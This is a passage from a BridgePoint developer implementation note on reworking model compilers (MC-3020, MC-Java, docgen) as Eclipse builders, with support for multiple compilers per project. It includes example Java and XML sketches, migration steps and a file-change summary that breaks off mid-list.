A custom builder provided by the model compiler plugin would be\nbetter.\n\nMore information about the introduction of multiple model compilers in\nBridgePoint can be found at <<dr-5>>.\n\nDocgen is another model compiler provided by BridgePoint; however, it was not\nimplemented as a builder or external builder but through a context menu item.\nDocgen is logically a model compiler and it would simplify the interface to\npackage it as just another model compiler.\n\n2.2 Current model compiler flow\n\nCurrently, model compilers are invoked as two separate builders. First a builder\ncalled \"Model Compiler Pre-Build\" runs. This is a customized model export which\ninvokes the OAL parser, sets up the build space, collects all referred to data,\nremoves proxies and graphical instances and outputs one `.sql` file in the\n`code_generation` folder. In some cases the pre-builder does not parse OAL (e.g.\nMASL export) and sometimes it does not run at all (if the OAL is fully parsed\nand no files in `models\/` are newer than the output file in `code_generation`).\nNext, an external tool builder gets invoked which points to the `xtumlmc_build`\nPerl script packaged with BridgePoint.\n\n== 3 Requirements\n\n3.1 Model compilers shall stop using external tool builders\n\n3.2 Docgen shall be implemented as a model compiler\n\n3.3 BridgePoint shall support multiple model compilers on a single project\n\n3.4 Project preferences shall be moved to the \"Properties\" menu\n\n== 4 Work Required\n\n4.1 Updating model compiler builders\n\nWith a move toward real builders, there is no longer any need for a separate\nbuilder for the pre-build process. Instead, model compiler builders inherit from\nthe `AbstractExportBuilder` class which provides the pre-build functionality.\nThe first step for any model compiler builder is to execute the `preBuild`\nmethod. For some builders (like the MASL builder) a parameter is passed to\nensure that no OAL is parsed during pre-build. Note that since pre-build is\ninherited behavior for every model compiler, it will run first in every model\ncompiler in the build chain; however, it still does all the checks to see if a\nrun is necessary. If multiple model compilers are enabled on a single project,\nit is likely that nothing will occur in the second model compiler's pre-build\nbecause pre-build was handled in the first model compiler's pre-build.\n\nTake an example where docgen and MC-3020 are enabled on a project. If MC-3020 is\nfirst in the build chain, it will execute a pre-build, generate code and exit.\nNext docgen will invoke a pre-build but will see that no source files are newer\nthan the existing pre-build output and short circuit. The docgen builder will\nthen run and exit. On the other hand, if docgen runs first, pre-build will\nexecute (skipping OAL parse) and docgen will execute and then exit. Next MC-3020\npre-build will run and notice that the model is not parsed. In this case the\npre-build will recreate the output file. Then MC-3020 will generate code and\nexit.\n\nThis design assures that output will _always_ be present when necessary and that\nunnecessary pre-builds are avoided in the majority of cases. A sketch of the\nresulting builder shape follows.\n
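\nThe skeleton below is illustrative only: `AbstractExportBuilder` and `preBuild` come from the BridgePoint source as described above, while the builder ID, the OAL-parse flag, and the `invokeCompiler` helper are invented for this example.\n\n[source,java]\n----\nimport java.util.Map;\nimport org.eclipse.core.resources.IProject;\nimport org.eclipse.core.runtime.CoreException;\nimport org.eclipse.core.runtime.IProgressMonitor;\n\n\/\/ Hypothetical model compiler builder following the pattern described above\npublic class ExampleMcBuilder extends AbstractExportBuilder {\n\n    public static final String BUILDER_ID = \"org.xtuml.bp.mc.example.builder\"; \/\/ example ID\n\n    @Override\n    protected IProject[] build(int kind, Map<String, String> args,\n            IProgressMonitor monitor) throws CoreException {\n        \/\/ Step 1: inherited pre-build (short-circuits if the output is up to date)\n        preBuild(getProject(), true \/* parse OAL *\/, monitor);\n        \/\/ Step 2: model-compiler-specific code generation\n        invokeCompiler(getProject(), monitor);\n        return null; \/\/ no downstream projects need a rebuild\n    }\n\n    private void invokeCompiler(IProject project, IProgressMonitor monitor) {\n        \/\/ e.g. launch xtumlmc_build and pipe its output to the model compiler console\n    }\n}\n----\n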
\n4.1.1 MC-3020\n\nAll of the MC-3020 based model compilers were consolidated into one plugin\ncalled `org.xtuml.bp.mc.mc3020`. The builder was updated to remove the\nfunctionality which sets up and invokes the external tool builder. Instead, a new\nbuilder `Mc3020Builder` was introduced which first runs the pre-builder, then\ninvokes `xtumlmc_build` and handles all of the input and output. The string\nidentifiers for the MC nature and builder have been changed. Legacy projects\nwith the old identifiers will need to be upgraded. See <<5 Implementation\nComments>> for more information.\n\n4.1.1.1 Preferences\n\nA new preferences page was added for projects configured with the MC-3020\nnature. The target language for MC-3020 can be configured. The default is C.\n\nimage::mc3020_prefs.png[mc3020_prefs.png,width=75%]\n\n4.1.1.2 CDT for MC-3020 projects\n\nDuring creation of an MC-3020 project or setting of model compilers, the\npreferences in the previous section can be set. Additionally, the project can\nbe converted to a C\/C{plus}{plus} project (adds the CDT nature and builders to\nthe project). The default for this option is unchecked. MC-3020 is often\nused just for code generation, and other C\/C{plus}{plus} build tools are\nrequired to build the source for the chosen target.\n\nimage::new_mc3020_project.png[new_mc3020_project.png,width=75%]\n\n4.1.1.3 `org.xtuml.bp.cdt` plugin\n\nThere used to be a plugin called `org.xtuml.bp.cdt`. Its only purpose in life\nwas to wait for projects to be created. When a project was created that had one\nof the MC-3020 flavor model compilers set, it automatically set it to a CDT\nproject. This plugin has been completely removed now that the functionality\nstated above is implemented.\n\n4.1.2 MC-Java\n\nThe MC-Java plugin was cleaned up and renamed from `org.xtuml.bp.mc.java.source`\nto simply `org.xtuml.bp.mc.java`. The MC nature and builder names were changed\nand updated in the source projects that use them. MC-Java was removed from the\nlist of available model compilers. It can still be configured manually by\nediting the `.project` file, but it is not used by BridgePoint users other than\nby the BridgePoint project itself, so it only confuses new users.\n\n4.1.3 Docgen\n\nThe `org.xtuml.bp.docgen` plugin was removed. A new plugin\n`org.xtuml.bp.mc.docgen` was introduced following the same pattern as the other\nMC plugins. The behavior found in the `Generator` class in the old docgen plugin\nwas adapted to work as a builder. The \"Create Documentation\" CME associated with\ndocgen was removed; docgen is instead executed during builds. Docgen is now\navailable in the list of model compilers when creating a new project or setting\nmodel compilers.\n\n4.1.3.1 Preferences\n\nA new preference page was added for projects configured with the docgen nature.\nThe output destination can be configured. The builder can be configured to open\nthe output file when finished. The defaults are the `doc\/` directory and to\nalways open the output. This mirrors current behavior.\n\nimage::docgen_prefs.png[docgen_prefs.png,width=75%]\n\n4.2 Delegating wizards\n\nA mechanism exists for creating new projects and setting model compilers called\n\"delegating wizards.\" The idea is that model compiler plugins can dynamically\ncontribute wizard pages to the new project wizard without re-building\nBridgePoint using an Eclipse extension point. This is very handy if users want\nto develop their own model compiler plugins and access them through the UI.\n\nPreviously, exactly one model compiler had to be assigned to each project. This work\nextended the delegating wizard framework such that zero to many model compilers\ncan be assigned to any project. A project could have both docgen and MC-3020 or\na project could simply have no model compilers. With this change the \"None\"\nmodel compiler went away.\n\nimage::mcs.png[mcs.png,width=75%]\n\nOnce one or more model compilers are selected, if they have additional\nconfiguration, those wizard pages are added to the new project wizard.\n\nRead more about delegating wizards at <<dr-5>>. An example of the resulting\nproject configuration is shown below.\n
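\nWith two model compilers enabled, the project's `.project` file carries one `buildCommand` entry per builder. The fragment below is only an illustration: the nature and builder identifier strings are placeholders, since the actual new identifiers live in the plugins themselves.\n\n[source,xml]\n----\n<projectDescription>\n  <buildSpec>\n    <buildCommand>\n      <name>org.xtuml.bp.mc.mc3020.builder<\/name> <!-- placeholder ID -->\n    <\/buildCommand>\n    <buildCommand>\n      <name>org.xtuml.bp.mc.docgen.builder<\/name> <!-- placeholder ID -->\n    <\/buildCommand>\n  <\/buildSpec>\n  <natures>\n    <nature>org.xtuml.bp.mc.mc3020.nature<\/nature> <!-- placeholder ID -->\n    <nature>org.xtuml.bp.mc.docgen.nature<\/nature> <!-- placeholder ID -->\n  <\/natures>\n<\/projectDescription>\n----\n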
4.3 Console management\n\nModel compilers now get first-class consoles. A utility class\n`ModelCompilerConsoleManager` was added to handle the common functionality of\ndealing with consoles. An output and error stream are opened to the console to\nwhich the `stdout` and `stderr` of the model compiler executables are piped. The\nerror stream prints to the console in red. This class also redirects the output\nto Eclipse standard out and standard error for CLI builds.\n\n
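The pattern is the standard Eclipse console API. The following simplified\nsketch (not the actual `ModelCompilerConsoleManager` source) shows the idea:\nopen two streams on a console, color the error stream red, and pump the\nprocess output into them.\n\n[source,java]\n----\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.InputStreamReader;\n\nimport org.eclipse.swt.SWT;\nimport org.eclipse.swt.widgets.Display;\nimport org.eclipse.ui.console.ConsolePlugin;\nimport org.eclipse.ui.console.IConsole;\nimport org.eclipse.ui.console.MessageConsole;\nimport org.eclipse.ui.console.MessageConsoleStream;\n\n\/\/ Simplified model compiler console handling.\npublic final class ConsoleSketch {\n\n    public static void pipeToConsole(Process process, String name) {\n        MessageConsole console = new MessageConsole(name, null);\n        ConsolePlugin.getDefault().getConsoleManager()\n                .addConsoles(new IConsole[] { console });\n        MessageConsoleStream out = console.newMessageStream();\n        MessageConsoleStream err = console.newMessageStream();\n        \/\/ The error stream prints in red, as described above.\n        Display.getDefault().syncExec(() -> err.setColor(\n                Display.getDefault().getSystemColor(SWT.COLOR_RED)));\n        pipe(process.getInputStream(), out);\n        pipe(process.getErrorStream(), err);\n    }\n\n    private static void pipe(InputStream in, MessageConsoleStream stream) {\n        new Thread(() -> {\n            try (BufferedReader reader =\n                    new BufferedReader(new InputStreamReader(in))) {\n                String line;\n                while ((line = reader.readLine()) != null) {\n                    stream.println(line);\n                }\n            } catch (IOException e) {\n                \/\/ nothing useful to do if the pipe breaks\n            }\n        }).start();\n    }\n}\n----\n\n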
4.4 Project preferences\n\nProject preferences were moved to the \"Properties\" menu of a project. This is\nwhere most Eclipse tools handle project-specific preferences, but BridgePoint\nprovided its own CME. With this change, BridgePoint is much more like other\nEclipse-based tools. The old project preferences CME was removed and the\n\"Properties\" CME was added for model explorer.\n\nimage::project_prefs.png[project_prefs.png,width=75%]\n\nimage::properties_cme.png[properties_cme.png,width=50%]\n\n4.5 General code cleanup\n\nCode was cleaned up where applicable.\n\n4.5.1 `org.xtuml.bp.mc.template`\n\nThe template model compiler plugin was removed. It provided a mechanism to\nquickly create new model compiler plugin projects. It is a good idea, but it is\nnot being used and it currently does not work. Reintroducing something like the\ntemplate plugin may be a future project, but for now it is simply removed. Read\nmore about when this was introduced at <<dr-5>>.\n\n4.5.2 `org.xtuml.internal.test`\n\nThe `org.xtuml.internal.test` plugin was removed. This plugin only contained\nfiles used to test the old delegating wizard framework with respect to creating\nnew model compiler plugins using the template plugin. The delegating wizard\nframework has been updated and the template plugin has been removed, so these\ntests are deprecated. These tests are not run automatically and have not been\nrun recently.\n\n4.5.3 BridgePoint CLI\n\nThe CLI plugin had to be updated to properly refer to the new model compiler\nplugins. An attempt was made to overhaul the CLI build to run purely headless;\nhowever, there were problems affecting the BridgePoint build and these changes\nwere reverted.\n\n== 5 Implementation Comments\n\n5.1 Future enhancements\n\n5.1.1 RSL builder\n\nA possible future enhancement is to implement a generic RSL model compiler.\nThis would essentially just be an interface to `pyrsl`. See <<dr-6>>.\n\n
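For a sense of how thin such a builder could be, its core step might reduce to\nlittle more than launching `pyrsl`. The sketch below guesses at that step; the\n`python -m rsl.gen_erate` invocation and its flags follow common pyrsl usage\nand are assumptions, not a settled design.\n\n[source,java]\n----\nimport java.io.File;\nimport java.io.IOException;\n\n\/\/ Hypothetical core step of a generic RSL model compiler builder.\npublic final class RslBuilderSketch {\n\n    public static int generate(String modelSql, String archetype,\n            File outputDir) throws IOException, InterruptedException {\n        ProcessBuilder pb = new ProcessBuilder(\n                \"python\", \"-m\", \"rsl.gen_erate\",\n                \"-nopersist\",\n                \"-import\", modelSql,\n                \"-arch\", archetype);\n        pb.directory(outputDir);\n        pb.redirectErrorStream(true);\n        \/\/ Output would be piped to the model compiler console (see 4.3).\n        Process process = pb.start();\n        return process.waitFor();\n    }\n}\n----\n\n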
5.1.2 Purely headless CLI build\n\nAs mentioned above, some work was done to make the CLI build purely headless. It\nran into problems, but there is no real reason this cannot be done. It is\nfaster, lighter, and removes the requirement for a virtual frame buffer. See\n<<dr-7>>.\n\n5.1.3 Template plugin\n\nA new model compiler template plugin could be introduced as mentioned above.\nSee <<dr-8>>.\n\n5.2 Existing project migration\n\nWith this version of BridgePoint, projects currently using a BridgePoint model\ncompiler will need to be upgraded. Since this only affects Eclipse support\nfiles, the decision was made not to implement a migration tool or provide legacy\nsupport for older projects.\n\n5.2.1 Procedure\n\nUse the following procedure to update existing models. It is recommended that\nprojects that are not in revision control be backed up before an upgrade is\nattempted.\n\n. Right-click on the project and select \"Properties\"\n. In the \"Builders\" section, select \"Missing builder\n (org.xtuml.bp.mc.*.export_builder)\" and click \"Remove\"\n. In the \"Builders\" section, select \"Missing Compiler\" and click \"Remove\"\n. Click \"Apply and Close\"\n. Right-click on the project and select \"BridgePoint Utilities > Set Model\n Compilers\"\n. Follow the wizard to enable your desired model compiler(s)\n\n5.2.2 BridgePoint development projects\n\nThe BridgePoint plugin projects which use MC-Java have been updated to use the\nnew nature and builder identifiers introduced by this work. Therefore,\nBridgePoint must be built with this version of BridgePoint or later. The build\nserver will need to be updated once this work is promoted. <<dr-3>> is raised to\ntrack this upgrade.\n\nThe model compiler projects (MASL tools, docgen, mcmc, etc.) have also been\nupgraded to be compatible with this version of BridgePoint.\n\nThe `MicrowaveOven` and `GPS_Watch` projects included with BridgePoint in the\nwelcome plugin will no longer build. <<dr-4>> is raised to track the upgrade of\nthose projects.\n\nOther projects in the `models` repository will need to be upgraded; however,\nthis can be done at a later time as needed.\n\n== 6 Unit Test\n\n6.1 Current unit test suite shall pass.\n\n6.1.1 Existing unit tests that are deprecated by this work shall be removed.\n\n6.1.2 Existing unit tests that are still valid but broken by this work shall be\nrepaired.\n\n== 7 User Documentation\n\n7.1 Project preferences\n\nReferences to the project preferences menu item in the documentation have been\nupdated to correctly refer to the \"Properties\" menu. Changes were made in the\n\"Preferences\" documentation, the \"MASL Modeling and Conversion Guide\" page, and\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2 CME menus\n\nIn addition to the project preferences, the following changes have been made to\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2.1 Create Documentation has been removed\n\n7.2.2 Set Model Compiler has been changed to \"Set Model Compilers\" and the\ndescription has been updated\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint\n- branch: 11491_mcs\n\n----\n doc-bridgepoint\/notes\/11491_mcs\/11491_mcs_int.adoc | 417 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n doc-bridgepoint\/notes\/11491_mcs\/docgen_prefs.png | Bin 0 -> 126365 bytes\n doc-bridgepoint\/notes\/11491_mcs\/mc3020_prefs.png | Bin 0 -> 112433 bytes\n doc-bridgepoint\/notes\/11491_mcs\/mcs.png | Bin 0 -> 94619 bytes\n doc-bridgepoint\/notes\/11491_mcs\/new_mc3020_project.png | Bin 0 -> 86537 bytes\n doc-bridgepoint\/notes\/11491_mcs\/project_prefs.png | Bin 0 -> 136695 bytes\n doc-bridgepoint\/notes\/11491_mcs\/properties_cme.png | Bin 0 -> 220452 bytes\n doc-bridgepoint\/process\/FAQ.md | 12 ++++\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Consistency (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Consistency.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Existing Projects (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Existing Projects.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - RTO Move (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - RTO Move.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - System Level Tests (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - System Level Tests.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Workspace Setup (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Workspace Setup.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL PkgCM Tests (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL PkgCM Tests.launch | 2 +-\n 
doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO SQL Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Model Compare Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Model Compare Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/OAL Content Assist Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/OAL Content Assist Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Open Declarations Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Open Declarations Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Parse All Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Parse All Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Search Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Search Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/TestVisibilityInElementChooser (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/TestVisibilityInElementChooser.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas CCP Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas CCP Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 1 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 1.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 3 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 3.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Explorer Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Explorer Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Properties Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Properties Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Text Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Text Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Welcome Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Welcome Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL DeclarationTypeProviderTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL DeclarationTypeProviderTest.launch | 2 +-\n 
doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ExampleModelsIntegrationTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ExampleModelsIntegrationTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LexerTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LexerTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LibraryTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LibraryTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LinkingTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LinkingTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL PrimitiveTypesTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL PrimitiveTypesTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL SyntacticPredicateTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL SyntacticPredicateTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeConformanceTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeConformanceTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeProviderTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeProviderTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValidatorTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValidatorTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValueConverterTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValueConverterTest.launch | 2 +-\n doc-bridgepoint\/review-minutes\/11491_mcs_rvm.adoc | 26 ++++++++\n releng\/org.xtuml.bp.releng.parent.tests\/pom.xml | 1 -\n releng\/org.xtuml.bp.releng.parent\/pom.xml | 11 +---\n src\/installer\/build_installer_bp.sh | 12 ++--\n src\/org.xtuml.bp.als\/.project | 3 +-\n src\/org.xtuml.bp.cdt\/.gitignore | 1 -\n src\/org.xtuml.bp.cdt\/.settings\/org.eclipse.jdt.core.prefs | 7 --\n src\/org.xtuml.bp.cdt\/META-INF\/MANIFEST.MF | 20 ------\n src\/org.xtuml.bp.cdt\/build.properties | 8 ---\n src\/org.xtuml.bp.cdt\/generate.xml | 33 ----------\n src\/org.xtuml.bp.cdt\/icons\/newsystem.gif | Bin 325 -> 0 bytes\n src\/org.xtuml.bp.cdt\/plugin.xml | 7 --\n src\/org.xtuml.bp.cdt\/pom.xml | 47 --------------\n src\/org.xtuml.bp.cdt\/src\/org\/xtuml\/bp\/cdt\/Activator.java | 71 ---------------------\n src\/org.xtuml.bp.cdt\/src\/org\/xtuml\/bp\/cdt\/wizards\/BridgePointCDTProjectWizard.java | 162 ----------------------------------------------\n src\/org.xtuml.bp.cli\/META-INF\/MANIFEST.MF | 5 +-\n src\/org.xtuml.bp.cli\/src\/org\/xtuml\/bp\/cli\/BuildExecutor.java | 490 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-----------------------------------------------------------------------\n src\/org.xtuml.bp.core\/.project | 3 +-\n src\/org.xtuml.bp.core\/arc\/create_core_plugin.inc | 55 ++++++++++++----\n src\/org.xtuml.bp.core\/generate.xml | 4 +-\n src\/org.xtuml.bp.core\/schema\/code-builders.exsd | 51 ---------------\n src\/org.xtuml.bp.core\/schema\/model-compilers.exsd | 72 ++++++++-------------\n 
src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/common\/NonRootModelElement.java | 6 +-\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/DelegatingWizard.java | 429 ++++++++++++++++++++++++++++++++++++++++++--------------------------------------------------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/IDelegateWizard.java | 9 +++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/ModelCompilerChooserPage.java | 199 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/NewSystemWizard.java | 395 ++++++++++++++++++++++++++++++++++++++++++++++++++--------------------------------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/SetBPProjectPreferencesAction.java | 77 ----------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/WizardDelegate.java | 386 --------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/WizardDelegateChooserPage.java | 138 ---------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/WizardNewSystemCreationPage.java | 129 ++++++++++++++++---------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectActionLanguagePreferencesPage.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectDependenciesPreferencesPage.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectPreferencesPage.java | 21 ++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectReferencesPreferencesPage.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.doc\/Reference\/MASL\/MASLConversionGuide\/MASLConversionGuide.adoc | 6 +-\n src\/org.xtuml.bp.doc\/Reference\/MASL\/MASLConversionGuide\/MASLConversionGuide.html | 10 +--\n src\/org.xtuml.bp.doc\/Reference\/MASL\/MASLConversionGuide\/images\/image01.png | Bin 75163 -> 107356 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.html | 20 +++---\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.md | 5 +-\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/me_menu.png | Bin 386604 -> 934462 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/utilities_menu.png | Bin 360408 -> 723312 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/Preferences.html | 1 +\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/Preferences.md | 2 +\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjActionLanguage.png | Bin 55725 -> 98550 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjDependencies.png | Bin 81965 -> 147553 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjIPR.png | Bin 66756 -> 105611 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjectPreferencesCME.png | Bin 36606 -> 343649 bytes\n src\/org.xtuml.bp.docgen\/.classpath | 7 --\n src\/org.xtuml.bp.docgen\/META-INF\/MANIFEST.MF | 32 ----------\n src\/org.xtuml.bp.docgen\/plugin.xml | 33 ----------\n 
src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/DocGenPlugin.java | 79 -----------------------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/actions\/makeDocumentationAction.java | 49 --------------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/ant\/tasks\/DocGenTask.java | 75 ----------------------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/generator\/Generator.java | 591 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.bp.internal.tools\/src\/org\/xtuml\/bp\/internal\/tools\/mcjava\/Activator.java | 1 -\n src\/org.xtuml.bp.io.image\/src\/org\/xtuml\/bp\/io\/image\/generator\/Generator.java | 333 ++++++++++++++++++++++++++++++++++++++++++++++-------------------------------------------------\n src\/org.xtuml.bp.mc.c.source\/.project | 48 --------------\n src\/org.xtuml.bp.mc.c.source\/.settings\/org.eclipse.jdt.core.prefs | 7 --\n src\/org.xtuml.bp.mc.c.source\/build.properties | 14 ----\n src\/org.xtuml.bp.mc.c.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.c.source\/defaults\/launch_specification\/Model Compiler.launch | 